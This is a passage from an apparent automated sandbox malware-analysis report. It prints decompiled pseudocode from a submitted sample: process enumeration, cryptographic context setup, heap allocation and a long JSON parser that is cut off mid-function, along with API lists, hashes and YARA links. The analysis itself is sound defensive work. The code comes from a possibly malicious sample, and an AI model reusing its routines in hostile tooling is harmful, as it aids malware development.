            • Instruction Fuzzy Hash: AA219676E0431A9FD714DFA9DA44AEFF7BCFF84720B14462AE904D7242E73099419B90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5425, Relevance: 4.5, APIs: 3, Instructions: 46processCOMMON
            Download Yara Rule
            C-Code - Quality: 75%
            			E009B5425(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v560;
				void* _t8;
				struct tagPROCESSENTRY32W* _t9;
				int _t19;
				void* _t20;

				_t19 = 0;
				_t8 = CreateToolhelp32Snapshot(2, 0); // executed
				_t20 = _t8;
				if(_t20 != 0xffffffff) {
					_t9 =  &_v560;
					_v560 = 0x22c;
					Process32FirstW(_t20, _t9); // executed
					while(_t9 != 0) {
						_t19 = _a12(_a8,  &_v560);
						if(_t19 == 0 || _a4 == 0) {
							_t9 = Process32NextW(_t20,  &_v560); // executed
							continue;
						} else {
							break;
						}
					}
					E009B4BEE(_t20); // executed
					return _t19;
				}
				return 0;
			}








            0x009b5430
            0x009b5435
            0x009b543b
            0x009b5440
            0x009b5446
            0x009b544c
            0x009b5458
            0x009b5489
            0x009b546d
            0x009b5473
            0x009b5483
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009b5473
            0x009b548e
            0x00000000
            0x009b5494
            0x00000000

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009B5435
            • Process32FirstW.KERNEL32(00000000,?), ref: 009B5458
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CreateFirstProcess32SnapshotToolhelp32
            • String ID:
            • API String ID: 2353314856-0
            • Opcode ID: 086fd50733ba8ce115fe02086ce44d27a2ef954d02d3e0cbdae4ba4d221417b7
            • Instruction ID: 09b68788f5054662947d168c1b5e6612c42a3780633e01ed357f5ce053dd3a44
            • Opcode Fuzzy Hash: 086fd50733ba8ce115fe02086ce44d27a2ef954d02d3e0cbdae4ba4d221417b7
            • Instruction Fuzzy Hash: 2101D6355095287FD720AA75BD0CFEF77AEDB89372F2101A5FD18C2191EB348D848AA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B549C, Relevance: 3.0, APIs: 2, Instructions: 46encryptionCOMMON
            Download Yara Rule
            C-Code - Quality: 54%
            			E009B549C(void* __edx, int _a4, intOrPtr _a8) {
				BYTE* _v0;
				void* _t7;
				signed int _t11;
				void* _t14;

				_t7 = E009B586A(_a4, _a8); // executed
				if(_t7 == 0) {
					if(E009B550D(__edx, _a4, _a8) != 0) {
						goto L1;
					} else {
						_pop(_t21);
						if( *0x9c1dc8 != 0) {
							L8:
							_t11 = CryptGenRandom( *0x9c1dc4, _a4, _v0);
							asm("sbb eax, eax");
							return  ~( ~_t11);
						} else {
							_t14 =  *0x9c127c(0x9c1dc4, 0, 0, 1, 0xf0000000);
							if(_t14 != 0) {
								 *0x9c1dc8 = 1;
								goto L8;
							} else {
								return _t14;
							}
						}
					}
				} else {
					L1:
					return 1;
				}
			}







            0x009b54a5
            0x009b54ae
            0x009b54c4
            0x00000000
            0x009b54c6
            0x009b54c6
            0x009b571a
            0x009b5742
            0x009b574e
            0x009b5756
            0x009b575b
            0x009b571c
            0x009b572c
            0x009b5734
            0x009b5738
            0x00000000
            0x009b5737
            0x009b5737
            0x009b5737
            0x009b5734
            0x009b571a
            0x009b54b0
            0x009b54b0
            0x009b54b4
            0x009b54b4

            APIs
            • CryptAcquireContextW.ADVAPI32(009C1DC4,00000000,00000000,00000001,F0000000,?,009B6AB5,?,00000030,00000000,?,?,009B6829,?,00000020,00000000), ref: 009B572C
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: AcquireContextCrypt
            • String ID:
            • API String ID: 3951991833-0
            • Opcode ID: 08a71def394ee10248fff7ec636605ee29373e0a1e38abf0c5745bd0fed32ff9
            • Instruction ID: 1d41917ab5abdf639f54da3f6d6749c447c0375fa4728143906d876b098519a8
            • Opcode Fuzzy Hash: 08a71def394ee10248fff7ec636605ee29373e0a1e38abf0c5745bd0fed32ff9
            • Instruction Fuzzy Hash: 6EF0C83665CA09BBEF111F60ED41FE53BD9AB41735F108024F60DC80E1DB7294A0A648
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B494C, Relevance: 3.0, APIs: 2, Instructions: 23memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B494C(intOrPtr _a4) {
				void* _t3;

				if( *0x9c1da4 != 0) {
					_t2 =  *0x9c1da0; // 0x2ad0000
				} else {
					_t2 = HeapCreate(0, 0x100000, 0); // executed
					 *0x9c1da0 = _t2;
					if(_t2 == 0) {
						 *0x9c1da0 = GetProcessHeap();
					}
					 *0x9c1da4 = 1;
				}
				_t3 = E009B48EE(_t2, _a4); // executed
				return _t3;
			}




            0x009b4956
            0x009b4987
            0x009b4958
            0x009b4961
            0x009b4967
            0x009b496e
            0x009b4976
            0x009b4976
            0x009b497b
            0x009b497b
            0x009b4990
            0x009b4998

            APIs
            • HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
            • GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Heap$CreateProcess
            • String ID:
            • API String ID: 1042935442-0
            • Opcode ID: 3f5aa336edf79b61ed55aea3c7a8f2641436237cc06b5f47fbc1926b64b5a5f2
            • Instruction ID: 66e126bd13eeefecbad3876ea8246a90a8205dd934f57c3e22440ca2ef9cf507
            • Opcode Fuzzy Hash: 3f5aa336edf79b61ed55aea3c7a8f2641436237cc06b5f47fbc1926b64b5a5f2
            • Instruction Fuzzy Hash: 8AE09A35C6C3009FEB80CBA4EE05FA237ACAB067A1F000015F146C61E3E7B19140BB0D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009BB7A2, Relevance: 2.3, Strings: 1, Instructions: 1025COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 81%
            			E009BB7A2(void* __ecx, void* __eflags, void* _a4, signed char _a7, signed char* _a8, signed char _a11, signed int _a12, signed int _a15) {
				signed char _v5;
				signed int _v12;
				intOrPtr* _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed long long _v48;
				signed int _v52;
				signed char* _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				signed char* _v76;
				char _v80;
				intOrPtr _v92;
				signed char _v100;
				void _v104;
				intOrPtr _v108;
				void* _v112;
				char _v116;
				signed int _t387;
				void* _t390;
				void* _t394;
				void* _t396;
				char _t397;
				void* _t399;
				void* _t400;
				void* _t401;
				void* _t402;
				intOrPtr _t405;
				intOrPtr _t410;
				intOrPtr _t411;
				void* _t419;
				void* _t424;
				void* _t431;
				void* _t440;
				void* _t447;
				void* _t452;
				signed char _t453;
				signed int _t454;
				void* _t456;
				void* _t457;
				void* _t458;
				signed char _t460;
				void* _t462;
				void* _t469;
				void* _t472;
				void* _t473;
				void* _t474;
				void* _t476;
				signed char _t481;
				signed int _t482;
				signed char _t483;
				signed char _t484;
				signed char _t519;
				signed int _t520;
				signed char _t521;
				void* _t527;
				void* _t528;
				void* _t529;
				void* _t531;
				void* _t533;
				signed int _t540;
				void* _t546;
				intOrPtr _t549;
				signed int _t554;
				void* _t561;
				intOrPtr _t562;
				signed char* _t567;
				char _t568;
				signed char* _t569;
				signed char* _t570;
				signed char* _t571;
				signed char* _t572;
				signed char* _t573;
				signed char* _t574;
				signed char* _t575;
				signed char* _t576;
				signed char* _t577;
				signed char* _t578;
				signed char* _t579;
				signed char* _t580;
				signed char* _t581;
				signed char* _t582;
				signed char* _t583;
				signed char* _t584;
				signed char* _t585;
				signed char* _t586;
				signed int _t588;
				char _t590;
				signed int _t594;
				void* _t596;
				signed int _t624;
				signed int _t642;
				signed int _t644;
				signed int _t648;
				signed int _t658;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				intOrPtr _t667;
				void* _t669;
				void _t670;
				intOrPtr _t671;
				signed int _t674;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t683;
				void* _t689;
				void* _t690;
				signed long long* _t691;
				signed long long _t712;
				signed long long _t715;

				_v36 = 0;
				E009B49D3( &_v116, 0, 0x34);
				_t387 = _a12;
				_t690 = _t689 + 0xc;
				_v40 = 0;
				_v52 = 0;
				_v64 = 0;
				_v60 = 0;
				_t567 = _a8;
				_v56 = _t567;
				if(_t387 >= 3 &&  *_t567 == 0xef && _t567[1] == 0xbb && _t567[2] == 0xbf) {
					_t567 =  &(_t567[3]);
					_t387 = _t387 - 3;
					_v56 = _t567;
				}
				_t712 =  *0x9bfbc0;
				_v32 = _t387 + _t567;
				_t588 = 6;
				_t390 = memcpy( &_v104, _a4, _t588 << 2);
				_t691 = _t690 + 0xc;
				_v112 = _t390;
				_v112 = _v112 - 8;
				_v108 = _t390 - 8;
				_v80 = 1;
				while(1) {
					L6:
					_v24 = _v24 & 0x00000000;
					_t664 = 0;
					_v28 = _v28 & 0;
					_t669 = 0;
					_t642 = 8;
					_a12 = 0;
					_v16 = 0;
					_v20 = 0;
					_v12 = _t642;
					_v72 = 1;
					while(1) {
						_v76 = _t567;
						if(_t567 != _v32) {
							_t590 =  *_t567;
						} else {
							_t590 = 0;
						}
						L10:
						_a11 = _t590;
						if((_t642 & 0x00000020) == 0) {
							L71:
							if((_v100 & 0x00000001) == 0) {
								L100:
								if(_t642 >= 0) {
									if((_t642 & 0x00000008) == 0) {
										_t259 = _t669 + 4; // 0x4
										_t394 = _t259;
										_t670 =  *_t394;
										_a4 = _t394;
										if(_t670 == 1) {
											st0 = _t712;
											_t396 = _t590 - 9;
											if(_t396 == 0) {
												L240:
												_t669 = _v16;
												L241:
												_t397 = _v80;
												L242:
												_t712 =  *0x9bfbc0;
												_t567 =  &(_t567[1]);
												_v76 = _t567;
												if(_t567 != _v32) {
													_t590 =  *_t567;
												} else {
													_t590 = 0;
												}
												goto L10;
											}
											_t527 = _t396 - 1;
											if(_t527 == 0) {
												_v72 = _v72 + 1;
												_v68 = _v68 & 0x00000000;
												goto L240;
											}
											_t528 = _t527 - 3;
											if(_t528 == 0) {
												goto L240;
											}
											_t529 = _t528 - 0x13;
											if(_t529 == 0) {
												goto L240;
											}
											_t531 = _t529;
											if(_t531 == 0) {
												if((_t642 & 0x00000004) != 0) {
													L247:
													_t568 = _v80;
													_t405 =  !=  ? _v28 : _v36;
													if(_t405 == 0) {
														L249:
														if(_t568 == 0) {
															E009BC3EC( &_v104, _v28);
														}
														return 0;
													} else {
														goto L248;
													}
													do {
														L248:
														_t671 =  *((intOrPtr*)(_t405 + 0x10));
														_v92(_t405);
														_t405 = _t671;
													} while (_t671 != 0);
													goto L249;
												}
												_t669 = _v16;
												_t642 = _t642 | 0x00000020;
												_t664 = 0;
												_v12 = _t642;
												_a12 = 0;
												_v24 =  *((intOrPtr*)(_t669 + 0x10));
												L227:
												if((_t642 & 0x00000002) != 0) {
													_t642 = _t642 & 0xfffffffd;
													_t567 = _t567 - 1;
													_v12 = _t642;
													_v76 = _t567;
												}
												if((_t642 & 0x00000001) != 0) {
													_t410 =  *_t669;
													_t644 = _t642 & 0xfffffffe | 0x00000004;
													_t594 = _t644;
													if(_t410 != 0) {
														_t642 =  !=  ? _t594 : _t644 | 0x00000008;
														_v12 = _t642;
														if(_v80 == 0) {
															_t596 =  *((intOrPtr*)(_t410 + 4)) - 1;
															if(_t596 == 0) {
																 *((intOrPtr*)( *(_t410 + 8) * 0xc +  *((intOrPtr*)(_t410 + 0xc)) + 8)) = _t669;
															} else {
																if(_t596 == 1) {
																	 *((intOrPtr*)( *((intOrPtr*)(_t410 + 0xc)) +  *(_t410 + 8) * 4)) = _t669;
																}
															}
														}
														_t411 =  *_t669;
														 *((intOrPtr*)(_t411 + 8)) =  *((intOrPtr*)(_t411 + 8)) + 1;
														if( *((intOrPtr*)(_t411 + 8)) > _v112) {
															goto L247;
														} else {
															_t669 =  *_t669;
															_v16 = _t669;
															_v20 = _t669;
															goto L241;
														}
													}
													_t642 = _t644 | 0x00000080;
													L82:
													_v12 = _t642;
												}
												goto L241;
											}
											_t533 = _t531 - 0xa;
											if(_t533 == 0) {
												if((_t642 & 0x00000004) == 0) {
													goto L247;
												}
												_t642 = _t642 & 0xfffffffb;
												L220:
												_v12 = _t642;
												L226:
												_t669 = _v16;
												goto L227;
											}
											if(_t533 != 0x51) {
												goto L247;
											}
											_t642 = _t642 & 0xfffffffb | 0x00000001;
											goto L220;
										}
										_t261 = _t670 - 3; // -3
										if(_t261 > 1) {
											st0 = _t712;
											goto L226;
										}
										if(_t590 - 0x30 > 9) {
											if(_t590 == 0x2b || _t590 == 0x2d) {
												if((_t642 & 0x00000c00) != 0x400) {
													goto L194;
												}
												st0 = _t712;
												_t642 =  !=  ? _t642 | 0x00000800 : _t642 | 0x1800;
												_v12 = _t642;
												goto L240;
											} else {
												if(_t590 != 0x2e || _t670 != 3) {
													L194:
													if((_t642 & 0x00000400) != 0) {
														if(_v40 == 0) {
															L246:
															st0 = _t712;
															goto L247;
														}
														_t540 = _v52;
														_t601 =  ~_t540;
														_t541 =  !=  ?  ~_t540 : _t540;
														 *_t691 = _t712;
														E009BC452( !=  ?  ~_t540 : _t540,  ~_t540, _t642 & 0x00001000,  ~_t540, _t601,  !=  ?  ~_t540 : _t540);
														_t669 = _v16;
														_t691 =  &(_t691[1]);
														_t642 = _v12;
														 *(_t669 + 8) = _t712 *  *(_t669 + 8);
														L206:
														if((_t642 & 0x00000100) != 0) {
															if( *_a4 != 3) {
																asm("fchs");
															} else {
																 *(_t669 + 8) =  ~( *(_t669 + 8));
																asm("adc eax, 0x0");
																 *(_t669 + 0xc) =  ~( *(_t669 + 0xc));
															}
														}
														_t642 = _t642 | 0x00000003;
														L211:
														_v12 = _t642;
														goto L227;
													}
													if(_t670 != 4) {
														_t669 = _v16;
														st0 = _t712;
														L199:
														if(_t590 == 0x65 || _t590 == 0x45) {
															_t546 = _a4;
															_t648 = _t642 | 0x00000400;
															if( *_t546 == 3) {
																 *_t546 = 4;
																asm("fild qword [esi+0x8]");
																 *(_t669 + 8) = _t712;
															}
															_v40 = _v40 & 0x00000000;
															_t642 = _t648 & 0xfffffdff;
															goto L82;
														} else {
															goto L206;
														}
													}
													_t547 = _v40;
													if(_v40 == 0) {
														goto L246;
													}
													asm("fild qword [ebp-0x3c]");
													_v48 = _t712;
													_t715 = _v48;
													_v48 = _t715;
													 *_t691 = _t715;
													E009BC452(_t547, _t590, _t642, _t590, _t590, _t547);
													asm("fdivr qword [ebp-0x2c]");
													_t691 =  &(_t691[1]);
													_t549 = _v16;
													_t669 = _v20;
													_t567 = _v76;
													_t642 = _v12;
													_t590 = _a11;
													_v16 = _t669;
													_t712 = _t715 +  *(_t549 + 8);
													 *(_t549 + 8) = _t712;
													goto L199;
												} else {
													st0 = _t712;
													if(_v40 == 0) {
														goto L247;
													}
													_t669 = _v16;
													_v40 = _v40 & 0x00000000;
													 *_a4 = 4;
													asm("fild qword [esi+0x8]");
													 *(_t669 + 8) = _t712;
													goto L241;
												}
											}
										}
										st0 = _t712;
										_t554 = _v40 + 1;
										_v40 = _t554;
										if(_t670 == 3) {
											if((_t642 & 0x00000400) != 0) {
												L185:
												_t642 = _t642 | 0x00000800;
												_v12 = _t642;
												_v52 = _a11 + 0xffffffd0 + _v52 * 0xa;
												goto L240;
											}
											if((0x00000200 & _t642) != 0) {
												goto L247;
											}
											if(_t554 == 1 && _t590 == 0x30) {
												_t642 = _t642 | 0x00000200;
												_v12 = _t642;
											}
											asm("cdq");
											_t665 = _t642;
											_t561 = E009BC670( *((intOrPtr*)(_v16 + 8)),  *((intOrPtr*)(_v16 + 0xc)), 0xa, 0);
											_t562 = _v16;
											asm("adc edi, edx");
											_t642 = _v12;
											 *((intOrPtr*)(_t562 + 8)) = _t590 - 0x30 + _t561;
											_t669 = _t562;
											 *(_t669 + 0xc) = _t665;
											_t664 = _a12;
											goto L241;
										}
										if((_t642 & 0x00000400) != 0) {
											goto L185;
										}
										asm("cdq");
										_t666 = _t642;
										_v64 = _t590 - 0x30 + E009BC670(_v64, _v60, 0xa, 0);
										asm("adc edi, edx");
										_t642 = _v12;
										_v60 = _t666;
										_t664 = _a12;
										goto L240;
									}
									st0 = _t712;
									_t399 = _t590 - 9;
									if(_t399 == 0) {
										goto L241;
									}
									_t400 = _t399 - 1;
									if(_t400 == 0) {
										L107:
										_v72 = _v72 + 1;
										_v68 = _v68 & 0x00000000;
										goto L241;
									}
									_t401 = _t400 - 3;
									if(_t401 == 0) {
										goto L241;
									}
									_t402 = _t401 - 0x13;
									if(_t402 == 0) {
										goto L241;
									}
									if(_t402 == 0x3d) {
										if(_t669 == 0 ||  *((intOrPtr*)(_t669 + 4)) != 2) {
											goto L247;
										} else {
											_t642 = _t642 & 0xfffffff3 | 0x00000001;
											goto L211;
										}
									}
									if((_t642 & 0x00000004) == 0) {
										if((_t642 & 0x00000040) == 0) {
											_v12 = _t642 & 0xfffffff7;
											if(_t590 == 0x22) {
												_t419 = E009BC497( &_v116,  &_v20,  &_v28,  &_v36, 5); // executed
												_t691 =  &(_t691[2]);
												if(_t419 == 0) {
													goto L247;
												}
												_t669 = _v20;
												_t567 = _v76;
												_t642 = _v12 | 0x00000020;
												_t664 = 0;
												_v12 = _t642;
												_v16 = _t669;
												_v24 =  *(_t669 + 0xc);
												_a12 = 0;
												goto L241;
											}
											if(_t590 == 0x5b) {
												_t424 = E009BC497( &_v116,  &_v20,  &_v28,  &_v36, 2);
												_t691 =  &(_t691[2]);
												if(_t424 == 0) {
													goto L247;
												}
												_t669 = _v20;
												_t642 = _v12 | 0x00000008;
												_t567 = _v76;
												_v12 = _t642;
												_v16 = _t669;
												goto L241;
											}
											if(_t590 == 0x66) {
												if(_v32 - _t567 < 4) {
													goto L247;
												}
												_t569 =  &(_t567[1]);
												_v76 = _t569;
												if( *_t569 != 0x61) {
													goto L247;
												}
												_t570 =  &(_t569[1]);
												_v76 = _t570;
												if( *_t570 != 0x6c) {
													goto L247;
												}
												_t571 =  &(_t570[1]);
												_v76 = _t571;
												if( *_t571 != 0x73) {
													goto L247;
												}
												_t572 =  &(_t571[1]);
												_v76 = _t572;
												if( *_t572 != 0x65) {
													goto L247;
												}
												_push(6);
												L164:
												_push( &_v36);
												_push( &_v28);
												_push( &_v20);
												_push( &_v116);
												_t431 = E009BC497();
												_t691 =  &(_t691[2]);
												if(_t431 == 0) {
													goto L247;
												}
												_t669 = _v20;
												_t642 = _v12 | 0x00000001;
												_t567 = _v76;
												_v12 = _t642;
												_v16 = _t669;
												goto L227;
											}
											if(_t590 == 0x6e) {
												if(_v32 - _t567 < 3) {
													goto L247;
												}
												_t573 =  &(_t567[1]);
												_v76 = _t573;
												if( *_t573 != 0x75) {
													goto L247;
												}
												_t574 =  &(_t573[1]);
												_v76 = _t574;
												if( *_t574 != 0x6c) {
													goto L247;
												}
												_t575 =  &(_t574[1]);
												_v76 = _t575;
												if( *_t575 != 0x6c) {
													goto L247;
												}
												_push(7);
												goto L164;
											}
											if(_t590 == 0x74) {
												if(_v32 - _t567 < 3) {
													goto L247;
												}
												_t576 =  &(_t567[1]);
												_v76 = _t576;
												if( *_t576 != 0x72) {
													goto L247;
												}
												_t577 =  &(_t576[1]);
												_v76 = _t577;
												if( *_t577 != 0x75) {
													goto L247;
												}
												_t578 =  &(_t577[1]);
												_v76 = _t578;
												if( *_t578 != 0x65) {
													goto L247;
												}
												_t440 = E009BC497( &_v116,  &_v20,  &_v28,  &_v36, 6);
												_t691 =  &(_t691[2]);
												if(_t440 == 0) {
													goto L247;
												}
												_t669 = _v20;
												_t567 = _v76;
												_t642 = _v12 | 1;
												_v16 = _t669;
												 *(_t669 + 8) = 1;
												_v12 = _t642;
												goto L227;
											}
											if(_t590 == 0x7b) {
												_t447 = E009BC497( &_v116,  &_v20,  &_v28,  &_v36, 1);
												_t691 =  &(_t691[2]);
												if(_t447 == 0) {
													goto L247;
												}
												_t669 = _v20;
												_t567 = _v76;
												_t642 = _v12;
												_v16 = _t669;
												goto L241;
											}
											if(_t590 < 0x30 || _t590 > 0x39) {
												if(_t590 != 0x2d) {
													goto L247;
												}
												goto L129;
											} else {
												L129:
												_t452 = E009BC497( &_v116,  &_v20,  &_v28,  &_v36, 3);
												_t691 =  &(_t691[2]);
												if(_t452 == 0) {
													goto L247;
												}
												_t567 = _v76;
												if(_v80 != 0) {
													_v40 = _v40 & 0x00000000;
													_t658 = _v12 & 0xffffe0ff;
													_v64 = _v64 & 0x00000000;
													_v60 = _v60 & 0x00000000;
													_v52 = _v52 & 0x00000000;
													_t669 = _v20;
													_v16 = _t669;
													if(_a11 == 0x2d) {
														_t642 = _t658 | 0x00000100;
														goto L82;
													}
													_t642 = _t658 | 0x00000002;
													goto L211;
												}
												_t453 = _a11;
												_t667 = _v32;
												L132:
												while(1) {
													if(_t453 < 0x30 || _t453 > 0x39) {
														if(_t453 == 0x2b || _t453 == 0x2d || _t453 == 0x65 || _t453 == 0x45 || _t453 == 0x2e) {
															goto L139;
														} else {
															goto L141;
														}
													} else {
														L139:
														_t567 =  &(_t567[1]);
														_v76 = _t567;
														if(_t567 == _t667) {
															L141:
															_t669 = _v20;
															_t642 = _v12 | 0x00000003;
															_t664 = _a12;
															_v12 = _t642;
															_v16 = _t669;
															goto L227;
														}
														_t453 =  *_t567;
														continue;
													}
												}
											}
										}
										if(_t590 != 0x3a) {
											goto L247;
										}
										_t642 = _t642 & 0xffffffbf;
										goto L82;
									}
									if(_t590 != 0x2c) {
										goto L247;
									}
									_t642 = _t642 & 0xfffffffb;
									goto L82;
								}
								if(_t590 == 0) {
									_t372 =  &_v80;
									 *_t372 = _v80 - 1;
									_t454 = _v28;
									_v36 = _t454;
									if( *_t372 < 0) {
										st0 = _t712;
										return _t454;
									}
									_t397 = _v80;
									_t567 = _v56;
									goto L6;
								}
								st0 = _t712;
								_t456 = _t590 - 9;
								if(_t456 == 0) {
									goto L241;
								}
								_t457 = _t456 - 1;
								if(_t457 == 0) {
									goto L107;
								}
								_t458 = _t457 - 3;
								if(_t458 == 0) {
									goto L241;
								}
								if(_t458 != 0x13) {
									goto L247;
								}
								goto L241;
							}
							if((_t642 & 0x00006000) == 0) {
								if(_t590 != 0x2f) {
									goto L100;
								}
								st0 = _t712;
								if((_t642 & 0x00000088) != 0 ||  *((intOrPtr*)(_t669 + 4)) == 1) {
									_t567 =  &(_t567[1]);
									_v76 = _t567;
									if(_t567 == _v32) {
										goto L247;
									}
									_t460 =  *_t567;
									if(_t460 == 0x2a) {
										_t642 = _t642 | 0x00004000;
										goto L82;
									}
									if(_t460 != 0x2f) {
										goto L247;
									}
									_t642 = _t642 | 0x00002000;
									goto L82;
								} else {
									goto L247;
								}
							}
							if((_t642 & 0x00002000) == 0) {
								if((_t642 & 0x00004000) == 0) {
									goto L100;
								}
								st0 = _t712;
								if(_t590 == 0) {
									goto L247;
								}
								if(_t590 != 0x2a) {
									goto L242;
								}
								if(_t567 >= _v32 - 1) {
									goto L241;
								}
								_t397 = _v80;
								if(_t567[1] == 0x2f) {
									_t642 = _t642 & 0xffffbfff;
									_t567 =  &(_t567[1]);
									_v12 = _t642;
								}
								goto L242;
							}
							st0 = _t712;
							if(_t590 == 0xd || _t590 == 0xa || _t590 == 0) {
								_t642 = _t642 & 0xffffdfff;
								_t567 = _t567 - 1;
								_v12 = _t642;
							}
							goto L242;
						}
						if(_t590 == 0 || _t664 > _v112) {
							goto L246;
						} else {
							if((_t642 & 0x00000010) == 0) {
								if(_t590 != 0x5c) {
									if(_t590 != 0x22) {
										st0 = _t712;
										L84:
										if(_t397 == 0) {
											 *((char*)(_t664 + _v24)) = _t590;
											_t669 = _v16;
										}
										L62:
										_t664 = _t664 + 1;
										_a12 = _t664;
										goto L242;
									}
									if(_t397 == 0) {
										 *((char*)(_t664 + _v24)) = 0;
									}
									_t642 = _t642 & 0xffffffdf;
									_v24 = _v24 & 0x00000000;
									_v12 = _t642;
									_t462 =  *((intOrPtr*)(_t669 + 4)) - 1;
									if(_t462 == 0) {
										st0 = _t712;
										if(_v80 == 0) {
											 *((intOrPtr*)( *(_t669 + 8) * 0xc +  *(_t669 + 0xc))) =  *((intOrPtr*)(_t669 + 0x10));
											_t642 = _v12;
											 *( *(_t669 + 8) * 0xc +  *(_t669 + 0xc) + 4) = _t664;
											_t142 = _t664 + 1; // 0x9
											 *((intOrPtr*)(_t669 + 0x10)) =  *((intOrPtr*)(_t669 + 0x10)) + _t142;
										} else {
											_t130 = _t664 + 1; // 0x9
											 *(_t669 + 0xc) =  *(_t669 + 0xc) + _t130;
										}
										_t642 = _t642 | 0x00000048;
										goto L82;
									} else {
										_t397 = _v80;
										if(_t462 == 4) {
											_t642 = _t642 | 0x00000001;
											 *(_t669 + 8) = _t664;
											_v12 = _t642;
										}
										goto L71;
									}
								}
								_t642 = _t642 | 0x00000010;
								st0 = _t712;
								_v12 = _t642;
								goto L242;
							}
							_t642 = _t642 & 0xffffffef;
							_v12 = _t642;
							st0 = _t712;
							_t469 = _t590 - 0x62;
							if(_t469 == 0) {
								_t397 = _v80;
								if(_t397 == 0) {
									 *((char*)(_t664 + _v24)) = 8;
								}
								goto L62;
							}
							_t472 = _t469 - 4;
							if(_t472 == 0) {
								_t397 = _v80;
								if(_t397 == 0) {
									 *((char*)(_t664 + _v24)) = 0xc;
								}
								goto L62;
							}
							_t473 = _t472 - 8;
							if(_t473 == 0) {
								_t397 = _v80;
								if(_t397 == 0) {
									 *((char*)(_t664 + _v24)) = 0xa;
								}
								goto L62;
							}
							_t474 = _t473 - 4;
							if(_t474 == 0) {
								_t397 = _v80;
								if(_t397 == 0) {
									 *((char*)(_t664 + _v24)) = 0xd;
								}
								goto L62;
							}
							_t476 = _t474;
							if(_t476 == 0) {
								_t397 = _v80;
								if(_t397 == 0) {
									 *((char*)(_t664 + _v24)) = 9;
								}
								goto L62;
							}
							if(_t476 == 1) {
								if(_v32 - _t567 <= 4) {
									goto L247;
								}
								_t579 =  &(_t567[1]);
								_v76 = _t579;
								_t481 = E009BB716( *_t579 & 0x000000ff);
								_a11 = _t481;
								if(_t481 == 0xff) {
									goto L247;
								}
								_t580 =  &(_t579[1]);
								_v76 = _t580;
								_t482 = E009BB716( *_t580 & 0x000000ff);
								_a15 = _t482;
								if(_t482 == 0xff) {
									goto L247;
								}
								_t581 =  &(_t580[1]);
								_v76 = _t581;
								_t483 = E009BB716( *_t581 & 0x000000ff);
								_a7 = _t483;
								if(_t483 == 0xff) {
									goto L247;
								}
								_t567 =  &(_t581[1]);
								_v76 = _t567;
								_t484 = E009BB716( *_t567 & 0x000000ff);
								_v5 = _t484;
								if(_t484 == 0xff) {
									goto L247;
								}
								_t674 = _a11 << 0x00000004 & 0x000000ff | _a15 & 0x000000ff;
								_v44 = _t674;
								_t624 = _t674 << 0x00000008 | _a7 << 0x00000004 & 0x000000ff | _v5 & 0x000000ff;
								_v44 = _t624;
								if((_t624 & 0x0000f800) != 0xd800) {
									L35:
									_t397 = _v80;
									if(_t624 > 0x7f) {
										if(_t624 > 0x7ff) {
											if(_t624 > 0xffff) {
												if(_t397 == 0) {
													_t675 = _v24;
													 *(_t664 + _t675) = _t624 >> 0x00000012 | 0x000000f0;
													 *(_t664 + _t675 + 1) = _t624 >> 0x0000000c & 0x0000003f | 0x00000080;
													 *(_t664 + _t675 + 2) = _t624 >> 0x00000006 & 0x0000003f | 0x00000080;
													 *(_t664 + _t675 + 3) = _t624 & 0x0000003f | 0x00000080;
													_t664 = _t664 + 4;
													L44:
													_a12 = _t664;
													goto L240;
												}
												_t664 = _t664 + 4;
